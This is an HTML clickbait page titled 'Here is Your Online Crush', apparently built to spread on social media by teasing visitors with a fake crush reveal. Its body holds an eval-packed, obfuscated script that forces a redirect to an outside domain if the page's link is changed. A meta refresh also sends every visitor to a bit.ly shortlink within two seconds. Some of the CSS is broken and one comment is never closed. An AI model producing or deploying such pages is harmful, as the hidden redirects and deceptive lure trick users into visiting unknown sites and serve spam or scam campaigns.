<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
 

<head>

  <title> Here is Your Online Crush </title>
 <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Expires" content="0"/>
<meta name="viewport" content="initial-scale=1, maximum-scale=1">
<meta name="twitter:card" value="summary">
<meta property="og:description" content="Clik Here For More Information"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta property="og:type" content="article" />
<meta property="og:title" content="Here is Your Online Crush " />
<meta name="og:image" content="3.png">

<script src="jquery.min.js"></script>
<style> 
 .preview {
 	width:100%;
 	Color:red;
 	Padding:10px;
 }
 .preview h2 {

 	padding-top: 10px;
 	padding-bottom: 10px;
 	width:400px;
 	height: auto;
 	background-color:red;
 	border-radius: 5px;
 	color:white;
 	margin:auto;
 	border-color: black;
 	border
 }
 .preview img{
 	-webkit-box-shadow: 2px 25px 46px -2px rgba(240,48,74,0.66);
-moz-box-shadow: 2px 25px 46px -2px rgba(240,48,74,0.66);
box-shadow: 2px 25px 46px -2px rgba(240,48,74,0.66)
 	padding-top: 20px;
 	width:400px;
 	height: auto;
 	background-color: red;
 	margin:auto;
 	border-radius: 10px;

 }
 footer a {
 	color:red;
 	font-size: 20px;
 	width:300px;
 	text-align: center;

 }
</style>

 </head> <body>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(9).c(d(){2 0=$("a").e(\'3\');2 1="4://7.6.5.8";b(0==1){$("i").f("j","h")}g{k.3="4://7.6.5.8"}});',21,21,'check|haris|var|href|http|info|kenheat|www|document||if|ready|function|attr|css|else|orange|body|background|location'.split('|'),0,{}))
</script>
<script>
/*setTimeout(function () {
window.location.href = "http://bit.ly/2x28IlG";
},100000000000000000000000000000000000000);
</script>
 <div class="preview">
                  <h2 align="center">Here is Your Online Crush </h2>
                   <center><img align="middle" width="200" height="auto"src="3.png" alt="3.png" title="3.png" /> </center>
 </div>
                 <center> <a href="http://bit.ly/2x28IlG">CLICK HERE TO </a> </center>
                 <center> <a href="http://bit.ly/2x28IlG">SEE HOW YOU GOT THIS CRUSH </a> </center>

<meta http-equiv="refresh" content="2;url=http://bit.ly/2x28IlG">
</body>
